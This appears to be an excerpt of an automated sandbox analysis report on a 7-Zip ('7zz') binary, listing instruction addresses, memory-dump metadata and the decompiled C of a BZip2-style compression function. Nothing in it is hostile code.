                                                                                  0x004354ca
                                                                                  0x004354ca
                                                                                  0x004354cd
                                                                                  0x00000000
                                                                                  0x004354cd
                                                                                  0x0043537f
                                                                                  0x00435305
                                                                                  0x00435307
                                                                                  0x00435309
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00435312
                                                                                  0x00435316
                                                                                  0x00435316
                                                                                  0x00435316
                                                                                  0x0043531c
                                                                                  0x0043531f
                                                                                  0x00000000
                                                                                  0x0043531f
                                                                                  0x004352e7
                                                                                  0x004350db
                                                                                  0x004350e1
                                                                                  0x004350e4
                                                                                  0x004350e8
                                                                                  0x004350f4
                                                                                  0x004350fb
                                                                                  0x004350fd
                                                                                  0x004350ff
                                                                                  0x0043510e
                                                                                  0x0043510e
                                                                                  0x00435111
                                                                                  0x00000000
                                                                                  0x00435111
                                                                                  0x00435108
                                                                                  0x0043510a
                                                                                  0x0043510c
                                                                                  0x0043511a
                                                                                  0x0043511d
                                                                                  0x0043511f
                                                                                  0x00435124
                                                                                  0x00435127
                                                                                  0x00435127
                                                                                  0x00435127
                                                                                  0x00435127
                                                                                  0x00435133
                                                                                  0x00435135
                                                                                  0x00435138
                                                                                  0x0043513a
                                                                                  0x00000000
                                                                                  0x0043513a
                                                                                  0x00000000
                                                                                  0x00434fd8
                                                                                  0x00434fda
                                                                                  0x00434fe0
                                                                                  0x00434fe3
                                                                                  0x00434fe7
                                                                                  0x00434ff3
                                                                                  0x00434ffa
                                                                                  0x00434ffc
                                                                                  0x00434ffe
                                                                                  0x0043509a
                                                                                  0x0043509c
                                                                                  0x0043509e
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004350a4
                                                                                  0x004350a7
                                                                                  0x004350a9
                                                                                  0x004350ae
                                                                                  0x004350b1
                                                                                  0x004350b1
                                                                                  0x004350b1
                                                                                  0x004350b1
                                                                                  0x004350bc
                                                                                  0x004350be
                                                                                  0x004350c1
                                                                                  0x004350c3
                                                                                  0x0043513e
                                                                                  0x0043513e
                                                                                  0x00435322
                                                                                  0x00435322
                                                                                  0x00435324
                                                                                  0x0043532d
                                                                                  0x0043532d
                                                                                  0x00000000
                                                                                  0x00435324
                                                                                  0x0043500b
                                                                                  0x0043500b
                                                                                  0x0043500d
                                                                                  0x00435012
                                                                                  0x00435012
                                                                                  0x00435015
                                                                                  0x0043501b
                                                                                  0x0043501f
                                                                                  0x00435024
                                                                                  0x00435027
                                                                                  0x0043502b
                                                                                  0x0043502d
                                                                                  0x00435032
                                                                                  0x00435032
                                                                                  0x00435035
                                                                                  0x00435038
                                                                                  0x0043503c
                                                                                  0x0043503e
                                                                                  0x00435043
                                                                                  0x00435043
                                                                                  0x00435046
                                                                                  0x00435049
                                                                                  0x0043504d
                                                                                  0x0043504f
                                                                                  0x00435054
                                                                                  0x00435054
                                                                                  0x00435057
                                                                                  0x0043505a
                                                                                  0x0043505e
                                                                                  0x00435060
                                                                                  0x00435065
                                                                                  0x00435065
                                                                                  0x00435068
                                                                                  0x0043506b
                                                                                  0x0043506f
                                                                                  0x00435071
                                                                                  0x00435076
                                                                                  0x00435076
                                                                                  0x00435079
                                                                                  0x0043507c
                                                                                  0x00435080
                                                                                  0x00435082
                                                                                  0x00435082
                                                                                  0x0043508b
                                                                                  0x0043508b
                                                                                  0x00435877
                                                                                  0x00435877
                                                                                  0x00000000
                                                                                  0x00435877
                                                                                  0x00435004
                                                                                  0x00435004
                                                                                  0x00435007
                                                                                  0x00000000
                                                                                  0x00435007
                                                                                  0x00434fd2
                                                                                  0x004358a1
                                                                                  0x004358a5
                                                                                  0x004358ad
                                                                                  0x004358b1
                                                                                  0x004358b9
                                                                                  0x004358bd
                                                                                  0x004358c5
                                                                                  0x004358c9
                                                                                  0x004358d1
                                                                                  0x004358d5
                                                                                  0x004358dd
                                                                                  0x004358e1
                                                                                  0x004358e6
                                                                                  0x004358e6
                                                                                  0x004358e6
                                                                                  0x004358ed
                                                                                  0x00000000
                                                                                  0x00434eeb
                                                                                  0x00434eeb
                                                                                  0x00434eee
                                                                                  0x00434ef2
                                                                                  0x00434ef4
                                                                                  0x00434ef9
                                                                                  0x00434ef9
                                                                                  0x00434efc
                                                                                  0x00434eff
                                                                                  0x00434f03
                                                                                  0x00434f05
                                                                                  0x00434f0a
                                                                                  0x00434f0a
                                                                                  0x00434f0d
                                                                                  0x00434f10
                                                                                  0x00434f14
                                                                                  0x00434f16
                                                                                  0x00434f1b
                                                                                  0x00434f1b
                                                                                  0x00434f1e
                                                                                  0x00434f21
                                                                                  0x00434f25
                                                                                  0x00434f27
                                                                                  0x00434f2c
                                                                                  0x00434f2c
                                                                                  0x00434f2f
                                                                                  0x00434f32
                                                                                  0x00434f36
                                                                                  0x00434f38
                                                                                  0x00434f3d
                                                                                  0x00434f3d
                                                                                  0x00434f40
                                                                                  0x00434f43
                                                                                  0x00434f47
                                                                                  0x00434f49
                                                                                  0x00434f4e
                                                                                  0x00434f4e
                                                                                  0x00434f51
                                                                                  0x00434f56
                                                                                  0x00434f5b
                                                                                  0x00434f64
                                                                                  0x00434f64
                                                                                  0x00434ee9

                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00434D2D
                                                                                    • Part of subcall function 004358FF: __EH_prolog.LIBCMT ref: 00435904
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID:
                                                                                  • API String ID: 3519838083-0
                                                                                  • Opcode ID: ff6d11e2a075c4c8cdabb938ba6ac4d5ac1eb2450b40cc4ec04bc51db8d714f4
                                                                                  • Instruction ID: 4d673e12acc69f6e7e4ec967f927a2294ce107ae818d378fe87eae4aebf1c3ce
                                                                                  • Opcode Fuzzy Hash: ff6d11e2a075c4c8cdabb938ba6ac4d5ac1eb2450b40cc4ec04bc51db8d714f4
                                                                                  • Instruction Fuzzy Hash: 91926D70D00659DFDF14DFA8C594BAEBBB4BF48304F14409AE845AB382DB38AE45CB65
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00448730 Relevance: 1.9, Strings: 1, Instructions: 670COMMONCrypto
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 92%
                                                                                  			E00448730(intOrPtr __ecx, void* __eflags) {
				void* _t321;
				unsigned int _t322;
				signed int _t331;
				signed char _t334;
				signed int _t335;
				intOrPtr* _t337;
				intOrPtr _t341;
				signed int _t342;
				signed int _t345;
				signed int _t346;
				void* _t347;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t361;
				intOrPtr* _t364;
				signed int _t368;
				char _t369;
				char _t370;
				signed int _t379;
				signed int _t382;
				signed int _t383;
				signed int* _t385;
				intOrPtr _t387;
				intOrPtr _t399;
				void* _t414;
				signed int _t417;
				signed int _t420;
				signed int _t421;
				signed int _t422;
				void* _t429;
				char _t430;
				void* _t431;
				signed char _t433;
				intOrPtr _t444;
				signed int _t461;
				void* _t469;
				signed int* _t470;
				void* _t475;
				intOrPtr _t478;
				void* _t479;
				void* _t483;
				void* _t484;
				signed int _t498;
				signed int* _t499;
				signed char _t500;
				void* _t519;
				unsigned int _t525;
				char _t536;
				void* _t538;
				intOrPtr _t539;
				signed int* _t544;
				intOrPtr _t552;
				signed int _t565;
				signed char _t568;
				intOrPtr* _t572;
				signed int _t575;
				signed int _t576;
				intOrPtr _t585;
				intOrPtr _t586;
				signed int _t587;
				signed int _t588;
				void* _t589;
				void* _t591;
				void* _t592;
				void* _t593;
				unsigned int _t595;
				signed int _t596;
				intOrPtr _t598;
				void* _t599;
				unsigned int _t600;
				void* _t601;
				signed int _t604;
				signed int _t605;
				void* _t608;
				intOrPtr* _t609;
				intOrPtr _t610;
				void* _t611;
				intOrPtr* _t612;
				void* _t613;
				void* _t614;
				signed int _t616;
				intOrPtr _t627;
				signed int _t628;
				intOrPtr _t629;
				intOrPtr _t631;
				intOrPtr _t632;
				void* _t633;
				void* _t634;
				void* _t635;
				void* _t636;

				_t627 = __ecx;
				 *((intOrPtr*)(_t634 + 0x58)) = __ecx;
				E00448610(0);
				_t598 =  *((intOrPtr*)(_t634 + 0x680));
				_push(_t598);
				 *((intOrPtr*)( *((intOrPtr*)(__ecx + 0xc)) + E00459170( *((intOrPtr*)(__ecx + 0xc)),  *((intOrPtr*)(_t634 + 0x67c))) * 4)) = _t598;
				E00448580(__ecx, _t318, 0x18);
				 *((intOrPtr*)(_t634 + 0x60)) = 0;
				 *((intOrPtr*)(_t634 + 0x64)) = 0;
				_t414 = 0;
				 *((intOrPtr*)(_t634 + 0x68)) = 0;
				_t321 = memset(_t634 + 0x170, 0, 0x40 << 2);
				_t635 = _t634 + 0xc;
				 *((intOrPtr*)(_t635 + 0x6c)) = 0;
				if(_t598 > 0) {
					do {
						_t321 = _t321 + 1;
						 *((char*)(_t635 + 0x170)) = 1;
					} while (_t321 < _t598);
				}
				_t322 = 0;
				do {
					if( *((intOrPtr*)(_t635 + _t322 + 0x170)) != 0) {
						 *(_t635 + _t414 + 0x70) = _t322;
						_t414 = _t414 + 1;
						 *((char*)(_t635 + (_t322 >> 4) + 0x60)) = 1;
					}
					_t322 = _t322 + 1;
				} while (_t322 < 0x100);
				_t599 = 0;
				do {
					E00448610( *((intOrPtr*)(_t635 + _t599 + 0x60)));
					_t599 = _t599 + 1;
				} while (_t599 < 0x10);
				_t600 = 0;
				do {
					if( *((intOrPtr*)(_t635 + (_t600 >> 4) + 0x60)) != 0) {
						E00448610( *((intOrPtr*)(_t635 + _t600 + 0x170)));
					}
					_t600 = _t600 + 1;
				} while (_t600 < 0x100);
				 *((intOrPtr*)(_t635 + 0x3c)) =  *((intOrPtr*)(_t627 + 4));
				memset(_t635 + 0x270, 0, 0x102 << 2);
				_t636 = _t635 + 0xc;
				_t585 =  *((intOrPtr*)(_t636 + 0x3c));
				_t601 = 0;
				_t525 = 0;
				 *(_t636 + 0x38) = _t414 + 2;
				 *(_t636 + 0x1c) = 0;
				 *((intOrPtr*)(_t636 + 0x67c)) =  *((intOrPtr*)(_t636 + 0x67c)) - 1;
				 *((intOrPtr*)(_t636 + 0x20)) =  *((intOrPtr*)(_t627 + 0xc));
				do {
					_t461 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t636 + 0x20)))) +  *((intOrPtr*)(_t636 + 0x67c))));
					_t331 = 0;
					 *(_t636 + 0x17) = _t461;
					if( *(_t636 + 0x70) != _t461) {
						do {
							_t444 =  *((intOrPtr*)(_t636 + _t331 + 0x71));
							_t331 = _t331 + 1;
						} while (_t444 != _t461);
					}
					_t417 = _t331;
					 *(_t636 + 0x2c) = _t417;
					if(_t331 >= 8) {
						_t519 = _t636 + 0x70 - 1;
						do {
							 *((char*)(_t519 + _t331 + 1)) =  *((intOrPtr*)(_t519 + _t331));
							 *((char*)(_t519 + _t331)) =  *((intOrPtr*)(_t519 + _t331 - 1));
							 *((char*)(_t519 + _t331 - 1)) =  *((intOrPtr*)(_t519 + _t331 - 2));
							 *((char*)(_t519 + _t331 - 2)) =  *((intOrPtr*)(_t519 + _t331 - 3));
							 *((char*)(_t519 + _t331 - 3)) =  *((intOrPtr*)(_t519 + _t331 - 4));
							 *((char*)(_t519 + _t331 - 4)) =  *((intOrPtr*)(_t519 + _t331 - 5));
							 *((char*)(_t519 + _t331 - 5)) =  *((intOrPtr*)(_t519 + _t331 - 6));
							 *((char*)(_t519 + _t331 - 6)) =  *((intOrPtr*)(_t519 + _t331 - 7));
							_t331 = _t331 - 8;
						} while (_t331 >= 8);
						_t417 =  *(_t636 + 0x2c);
						_t461 =  *(_t636 + 0x17);
					}
					if(_t331 > 0) {
						do {
							 *((char*)(_t636 + _t331 + 0x70)) =  *((intOrPtr*)(_t636 + _t331 + 0x6f));
							_t331 = _t331 - 1;
						} while (_t331 > 0);
						_t417 =  *(_t636 + 0x2c);
					}
					 *(_t636 + 0x70) = _t461;
					if(_t417 != 0) {
						if(_t525 != 0) {
							do {
								_t576 = _t525 - 1;
								 *(_t601 + _t585) = _t576 & 0x00000001;
								_t601 = _t601 + 1;
								_t525 = _t576 >> 1;
								 *((intOrPtr*)(_t636 + 0x270 + (_t576 & 0x00000001) * 4)) =  *((intOrPtr*)(_t636 + 0x270 + (_t576 & 0x00000001) * 4)) + 1;
							} while (_t525 != 0);
						}
						if(_t417 < 0xfe) {
							 *(_t601 + _t585) = _t417 + 1;
						} else {
							 *(_t601 + _t585) = 0xff;
							_t601 = _t601 + 1;
							 *(_t601 + _t585) = _t417 + 2;
						}
						_t601 = _t601 + 1;
						 *((intOrPtr*)(_t636 + 0x274 + _t417 * 4)) =  *((intOrPtr*)(_t636 + 0x274 + _t417 * 4)) + 1;
					} else {
						_t525 = _t525 + 1;
					}
					_t334 =  *(_t636 + 0x1c) + 1;
					 *(_t636 + 0x1c) = _t334;
					 *((intOrPtr*)(_t636 + 0x20)) =  *((intOrPtr*)(_t636 + 0x20)) + 4;
				} while (_t334 <  *((intOrPtr*)(_t636 + 0x680)));
				if(_t525 != 0) {
					do {
						_t575 = _t525 - 1;
						 *(_t601 + _t585) = _t575 & 0x00000001;
						_t601 = _t601 + 1;
						_t525 = _t575 >> 1;
						 *((intOrPtr*)(_t636 + 0x270 + (_t575 & 0x00000001) * 4)) =  *((intOrPtr*)(_t636 + 0x270 + (_t575 & 0x00000001) * 4)) + 1;
					} while (_t525 != 0);
				}
				_t335 =  *(_t636 + 0x38);
				if(_t335 >= 0x100) {
					 *(_t601 + _t585) = 0xff;
					_t601 = _t601 + 1;
					 *(_t601 + _t585) = _t335;
				} else {
					 *(_t601 + _t585) = _t335 - 1;
				}
				 *((intOrPtr*)(_t636 + 0x26c + _t335 * 4)) =  *((intOrPtr*)(_t636 + 0x26c + _t335 * 4)) + 1;
				 *((intOrPtr*)(_t636 + 0x20)) = _t601 + 1;
				_t420 = 0;
				_t337 = _t636 + 0x270;
				_t469 = 0x102;
				do {
					_t586 =  *_t337;
					_t337 = _t337 + 4;
					_t420 = _t420 + _t586;
					_t469 = _t469 - 1;
				} while (_t469 != 0);
				_t470 =  *(_t627 + 0x10);
				_t587 = 2;
				 *(_t636 + 0x5c) = _t420;
				 *(_t636 + 0x48) = 2;
				 *((intOrPtr*)(_t636 + 0x50)) = 0xffffffff;
				 *(_t636 + 0x2c) = 2;
				_t604 = 8 +  *_t470 * 8 - _t470[1];
				 *(_t636 + 0x17) = _t470[2];
				_t138 = _t420 + 0x31; // 0x31
				 *(_t636 + 0x58) = _t604;
				 *(_t636 + 0x4c) = 0x51eb851f * _t138 >> 0x20 >> 4;
				while(1) {
					_t341 =  *((intOrPtr*)(_t627 + 0x8cdc));
					if(_t341 == 0) {
						goto L44;
					}
					 *_t470 = _t604 >> 3;
					_t470[1] = 8;
					_t499 =  *(_t627 + 0x10);
					_t499[1] = 8 - (_t604 & 0x00000007);
					_t499[2] =  *(_t636 + 0x17);
					if(_t587 > 6) {
						_t342 =  *(_t636 + 0x48);
						L51:
						 *(_t636 + 0x18) = _t342;
					} else {
						 *(_t636 + 0x18) = _t587;
					}
					L52:
					_t588 =  *(_t636 + 0x18);
					E00448580(_t627, _t588, 3);
					E00448580(_t627,  *(_t636 + 0x4c), 0xf);
					_t345 = _t420;
					_t421 = 0;
					 *(_t636 + 0x1c) = _t345;
					 *(_t636 + 0x10) = 0;
					 *((intOrPtr*)(_t636 + 0x24)) = _t627 + ((_t588 << 7) + _t588) * 2 - 0xee;
					do {
						_t475 = 0;
						_t346 = _t345 / _t588;
						_t605 = _t421;
						if(_t346 > 0) {
							_t572 = _t636 + 0x270 + _t421 * 4;
							do {
								_t631 =  *_t572;
								_t572 = _t572 + 4;
								_t475 = _t475 + _t631;
								_t605 = _t605 + 1;
							} while (_t475 < _t346);
						}
						_t173 = _t605 - 1; // 0x0
						_t628 = _t173;
						if(_t628 > _t421 && _t588 !=  *(_t636 + 0x18) && _t588 != 1 && ( *(_t636 + 0x10) & 0x00000001) == 1) {
							_t605 = _t628;
							_t475 = _t475 -  *((intOrPtr*)(_t636 + 0x270 + _t605 * 4));
						}
						_t629 =  *((intOrPtr*)(_t636 + 0x24));
						_t347 = 0;
						do {
							if(_t347 < _t421 || _t347 >= _t605) {
								_t536 = 1;
							} else {
								_t536 = 0;
							}
							 *((char*)(_t347 + _t629)) = _t536;
							_t347 = _t347 + 1;
						} while (_t347 <  *(_t636 + 0x38));
						_t421 = _t605;
						_t345 =  *(_t636 + 0x1c) - _t475;
						_t588 = _t588 - 1;
						 *(_t636 + 0x1c) = _t345;
						 *(_t636 + 0x10) =  *(_t636 + 0x10) + 1;
						 *((intOrPtr*)(_t636 + 0x24)) = _t629 - 0x102;
					} while (_t588 != 0);
					_t632 =  *((intOrPtr*)(_t636 + 0x54));
					 *(_t636 + 0x28) = 4;
					do {
						_t422 =  *(_t636 + 0x18);
						_t538 = 0;
						_t608 = _t632 + 0x620;
						do {
							_t589 = _t608;
							_t538 = _t538 + 1;
							_t608 = _t608 + 0x408;
							memset(_t589, 0, 0x102 << 2);
							_t636 = _t636 + 0xc;
						} while (_t538 < _t422);
						_t478 = 0;
						 *((intOrPtr*)(_t636 + 0x34)) = 0;
						 *(_t636 + 0x1c) = _t632 + 0x3680;
						do {
							_t539 =  *((intOrPtr*)(_t636 + 0x3c));
							_t591 = 0;
							_t609 = _t636 + 0x70;
							do {
								_t353 =  *((intOrPtr*)(_t478 + _t539));
								_t478 = _t478 + 1;
								if(0 >= 0xff) {
									_t353 = 0;
									_t478 = _t478 + 1;
								}
								 *_t609 = _t353;
								_t591 = _t591 + 1;
								_t609 = _t609 + 4;
							} while (_t591 < 0x32 && _t478 <  *((intOrPtr*)(_t636 + 0x20)));
							 *((intOrPtr*)(_t636 + 0x30)) = _t478;
							 *((intOrPtr*)(_t636 + 0x24)) = 0xffffffff;
							 *(_t636 + 0x10) = 0;
							_t633 = _t632 + 0x14;
							do {
								_t610 = 0;
								_t354 = 0;
								_t479 = _t636 + 0x70;
								do {
									_t479 = _t479 + 4;
									_t610 = _t610;
									_t354 = _t354 + 1;
								} while (_t354 < _t591);
								if(_t610 <  *((intOrPtr*)(_t636 + 0x24))) {
									 *((intOrPtr*)(_t636 + 0x24)) = _t610;
									 *( *(_t636 + 0x1c)) =  *(_t636 + 0x10);
								}
								_t356 =  *(_t636 + 0x10) + 1;
								_t633 = _t633 + 0x102;
								 *(_t636 + 0x10) = _t356;
							} while (_t356 <  *(_t636 + 0x18));
							_t632 =  *((intOrPtr*)(_t636 + 0x54));
							_t611 = _t632 + 0x5d6e388;
							 *((intOrPtr*)(_t636 + 0x34)) =  *((intOrPtr*)(_t636 + 0x34)) + 1;
							 *(_t636 + 0x1c) =  *(_t636 + 0x1c) + 1;
							_t483 = 0;
							_t544 = _t636 + 0x70;
							do {
								_t361 =  *_t544;
								_t544 =  &(_t544[1]);
								_t483 = _t483 + 1;
								 *((intOrPtr*)(_t611 + _t361 * 4)) =  *((intOrPtr*)(_t611 + _t361 * 4)) + 1;
							} while (_t483 < _t591);
							_t478 =  *((intOrPtr*)(_t636 + 0x30));
						} while (_t478 <  *((intOrPtr*)(_t636 + 0x20)));
						_t592 = 0;
						_t429 = _t632 + 0x14;
						_t612 = _t632 + 0x620;
						do {
							_t484 = 0;
							_t364 = _t612;
							do {
								if( *_t364 == 0) {
									 *_t364 = 1;
								}
								_t484 = _t484 + 1;
								_t364 = _t364 + 4;
							} while (_t484 <  *(_t636 + 0x38));
							_push(0x10);
							_push(0x102);
							_push(_t429);
							E00459960(_t612, _t612 + 0x1830);
							_t592 = _t592 + 1;
							_t429 = _t429 + 0x102;
							_t612 = _t612 + 0x408;
						} while (_t592 <  *(_t636 + 0x18));
						_t368 =  *(_t636 + 0x28) - 1;
						 *(_t636 + 0x28) = _t368;
					} while (_t368 != 0);
					_t369 = 0;
					do {
						 *((char*)(_t636 + _t369 + 0x40)) = _t369;
						_t369 = _t369 + 1;
					} while (_t369 <  *(_t636 + 0x18));
					_t370 =  *((intOrPtr*)(_t636 + 0x40));
					_t593 = 0;
					do {
						_t430 =  *((intOrPtr*)(_t593 + _t632 + 0x3680));
						_t613 = 0;
						if(_t370 != _t430) {
							do {
								E00448610(1);
								_t399 =  *((intOrPtr*)(_t636 + _t613 + 0x41));
								_t613 = _t613 + 1;
							} while (_t399 != _t430);
						}
						E00448610(0);
						while(_t613 > 0) {
							 *((char*)(_t636 + _t613 + 0x40)) =  *((intOrPtr*)(_t636 + _t613 + 0x3f));
							_t613 = _t613 - 1;
						}
						_t593 = _t593 + 1;
						_t370 = _t430;
						 *((char*)(_t636 + 0x40)) = _t370;
					} while (_t593 <  *(_t636 + 0x4c));
					 *(_t636 + 0x28) = 0;
					 *(_t636 + 0x10) = _t632 + 0x14;
					do {
						_t614 = 0;
						E00448580(_t632, 0, 5);
						_t431 = 0;
						do {
							while(_t614 != 0) {
								E00448610(1);
								if(_t614 >= 0) {
									E00448610(1);
									_t614 = _t614 - 1;
								} else {
									E00448610(0);
									_t614 = _t614 + 1;
								}
							}
							E00448610(0);
							_t431 = _t431 + 1;
						} while (_t431 <  *(_t636 + 0x38));
						_t379 =  *(_t636 + 0x28) + 1;
						 *(_t636 + 0x28) = _t379;
						 *(_t636 + 0x10) =  *(_t636 + 0x10) + 0x102;
					} while (_t379 <  *(_t636 + 0x18));
					 *((intOrPtr*)(_t636 + 0x30)) = 0;
					 *((intOrPtr*)(_t636 + 0x34)) = 0;
					 *((intOrPtr*)(_t636 + 0x24)) = 0;
					 *(_t636 + 0x10) = 0;
					 *(_t636 + 0x28) = _t632 + 0x3680;
					do {
						_t382 =  *(_t636 + 0x10);
						_t498 =  *((intOrPtr*)(_t382 +  *((intOrPtr*)(_t636 + 0x3c))));
						_t383 = _t382 + 1;
						 *(_t636 + 0x10) = _t383;
						if(0 >= 0xff) {
							_t498 = 0;
							 *(_t636 + 0x10) = _t383 + 1;
						}
						_t552 =  *((intOrPtr*)(_t636 + 0x30));
						if(_t552 == 0) {
							_t552 = 0x32;
							 *(_t636 + 0x28) =  *(_t636 + 0x28) + 1;
							 *((intOrPtr*)(_t636 + 0x34)) = _t632 + 0x175b76e;
							 *((intOrPtr*)(_t636 + 0x24)) = _t632 + 0x5d6fbb8;
						}
						 *((intOrPtr*)(_t636 + 0x30)) = _t552 - 1;
						_t385 =  *(_t632 + 0x10);
						_t616 = 0;
						_t595 =  *( *((intOrPtr*)(_t636 + 0x24)) + _t498 * 4);
						if(0 > 0) {
							do {
								_t500 = _t385[1];
								if(_t616 < _t500) {
									_t500 = _t616;
								}
								_t616 = _t616 - _t500;
								 *(_t636 + 0x1c) = _t500;
								_t385[2] = _t385[2] << _t500;
								_t565 = _t595 >> _t616;
								_t433 = _t565 | _t385[2];
								_t385[2] = _t433;
								_t595 = _t595 - (_t565 << _t616);
								_t568 = _t385[1] -  *(_t636 + 0x1c);
								_t385[1] = _t568;
								if(_t568 == 0) {
									 *(_t385[3] +  *_t385) = _t433;
									_t385[1] = 8;
									 *_t385 =  *_t385 + 1;
								}
							} while (_t616 > 0);
						}
					} while ( *(_t636 + 0x10) <  *((intOrPtr*)(_t636 + 0x20)));
					_t387 =  *((intOrPtr*)(_t632 + 0x8cdc));
					if(_t387 != 0) {
						_t470 =  *(_t632 + 0x10);
						_t604 =  *(_t636 + 0x58);
						_t596 =  *(_t636 + 0x2c);
						_t387 = 8 +  *_t470 * 8 - _t470[1] - _t604;
						if(_t387 >  *((intOrPtr*)(_t636 + 0x50))) {
							L126:
							_t587 = _t596 + 1;
							 *(_t636 + 0x2c) = _t587;
							if(_t587 <= 7) {
								_t420 =  *(_t636 + 0x5c);
								continue;
							}
						} else {
							if(_t596 != 6) {
								 *((intOrPtr*)(_t636 + 0x50)) = _t387;
								 *(_t636 + 0x48) = _t596;
								goto L126;
							}
						}
					}
					return _t387;
					L44:
					if(_t420 >= 0xc8) {
						if(_t420 >= 0x258) {
							if(_t420 >= 0x4b0) {
								asm("sbb eax, eax");
								_t342 = _t341 + 6;
								goto L51;
							} else {
								 *(_t636 + 0x18) = 4;
							}
						} else {
							 *(_t636 + 0x18) = 3;
						}
					} else {
						 *(_t636 + 0x18) = 2;
					}
					goto L52;
				}
			}






























































































                                                                                  0x0044873a
                                                                                  0x0044873e
                                                                                  0x00448742
                                                                                  0x00448747
                                                                                  0x00448758
                                                                                  0x00448764
                                                                                  0x00448769
                                                                                  0x00448775
                                                                                  0x00448782
                                                                                  0x00448786
                                                                                  0x00448788
                                                                                  0x0044878c
                                                                                  0x0044878c
                                                                                  0x00448790
                                                                                  0x00448796
                                                                                  0x00448798
                                                                                  0x004487a4
                                                                                  0x004487a7
                                                                                  0x004487a7
                                                                                  0x00448798
                                                                                  0x004487b0
                                                                                  0x004487b2
                                                                                  0x004487bb
                                                                                  0x004487bf
                                                                                  0x004487c6
                                                                                  0x004487c7
                                                                                  0x004487c7
                                                                                  0x004487cb
                                                                                  0x004487cc
                                                                                  0x004487d3
                                                                                  0x004487d5
                                                                                  0x004487dc
                                                                                  0x004487e1
                                                                                  0x004487e2
                                                                                  0x004487e7
                                                                                  0x004487e9
                                                                                  0x004487f4
                                                                                  0x00448800
                                                                                  0x00448800
                                                                                  0x00448805
                                                                                  0x00448806
                                                                                  0x00448816
                                                                                  0x00448826
                                                                                  0x00448826
                                                                                  0x00448832
                                                                                  0x00448836
                                                                                  0x00448838
                                                                                  0x0044883b
                                                                                  0x0044883f
                                                                                  0x00448843
                                                                                  0x0044884a
                                                                                  0x0044884e
                                                                                  0x0044885f
                                                                                  0x00448862
                                                                                  0x00448866
                                                                                  0x0044886a
                                                                                  0x0044886c
                                                                                  0x0044886c
                                                                                  0x00448870
                                                                                  0x00448871
                                                                                  0x0044886c
                                                                                  0x00448875
                                                                                  0x0044887a
                                                                                  0x0044887e
                                                                                  0x00448884
                                                                                  0x00448885
                                                                                  0x00448888
                                                                                  0x00448890
                                                                                  0x00448897
                                                                                  0x0044889f
                                                                                  0x004488a7
                                                                                  0x004488af
                                                                                  0x004488b7
                                                                                  0x004488bf
                                                                                  0x004488c3
                                                                                  0x004488c6
                                                                                  0x004488cb
                                                                                  0x004488cf
                                                                                  0x004488cf
                                                                                  0x004488d5
                                                                                  0x004488d7
                                                                                  0x004488db
                                                                                  0x004488df
                                                                                  0x004488e0
                                                                                  0x004488e4
                                                                                  0x004488e4
                                                                                  0x004488ea
                                                                                  0x004488ee
                                                                                  0x004488f5
                                                                                  0x004488f7
                                                                                  0x004488f7
                                                                                  0x00448901
                                                                                  0x00448904
                                                                                  0x00448914
                                                                                  0x00448916
                                                                                  0x00448916
                                                                                  0x004488f7
                                                                                  0x00448920
                                                                                  0x00448934
                                                                                  0x00448922
                                                                                  0x00448922
                                                                                  0x00448928
                                                                                  0x0044892b
                                                                                  0x0044892b
                                                                                  0x00448945
                                                                                  0x00448947
                                                                                  0x004488f0
                                                                                  0x004488f0
                                                                                  0x004488f0
                                                                                  0x00448958
                                                                                  0x0044895e
                                                                                  0x00448962
                                                                                  0x00448962
                                                                                  0x0044896e
                                                                                  0x00448970
                                                                                  0x00448970
                                                                                  0x0044897a
                                                                                  0x0044897d
                                                                                  0x0044898d
                                                                                  0x0044898f
                                                                                  0x0044898f
                                                                                  0x00448970
                                                                                  0x00448993
                                                                                  0x0044899c
                                                                                  0x004489a7
                                                                                  0x004489ab
                                                                                  0x004489ac
                                                                                  0x0044899e
                                                                                  0x004489a2
                                                                                  0x004489a2
                                                                                  0x004489bf
                                                                                  0x004489c1
                                                                                  0x004489c5
                                                                                  0x004489c7
                                                                                  0x004489ce
                                                                                  0x004489d3
                                                                                  0x004489d3
                                                                                  0x004489d5
                                                                                  0x004489d8
                                                                                  0x004489da
                                                                                  0x004489da
                                                                                  0x004489dd
                                                                                  0x004489e0
                                                                                  0x004489e5
                                                                                  0x004489e9
                                                                                  0x004489f2
                                                                                  0x004489fa
                                                                                  0x00448a0a
                                                                                  0x00448a0f
                                                                                  0x00448a13
                                                                                  0x00448a1b
                                                                                  0x00448a1f
                                                                                  0x00448a29
                                                                                  0x00448a29
                                                                                  0x00448a31
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00448a3c
                                                                                  0x00448a4b
                                                                                  0x00448a4e
                                                                                  0x00448a51
                                                                                  0x00448a54
                                                                                  0x00448a57
                                                                                  0x00448a5f
                                                                                  0x00448aa6
                                                                                  0x00448aa6
                                                                                  0x00448a59
                                                                                  0x00448a59
                                                                                  0x00448a59
                                                                                  0x00448aaa
                                                                                  0x00448aaa
                                                                                  0x00448ab3
                                                                                  0x00448ac1
                                                                                  0x00448ac8
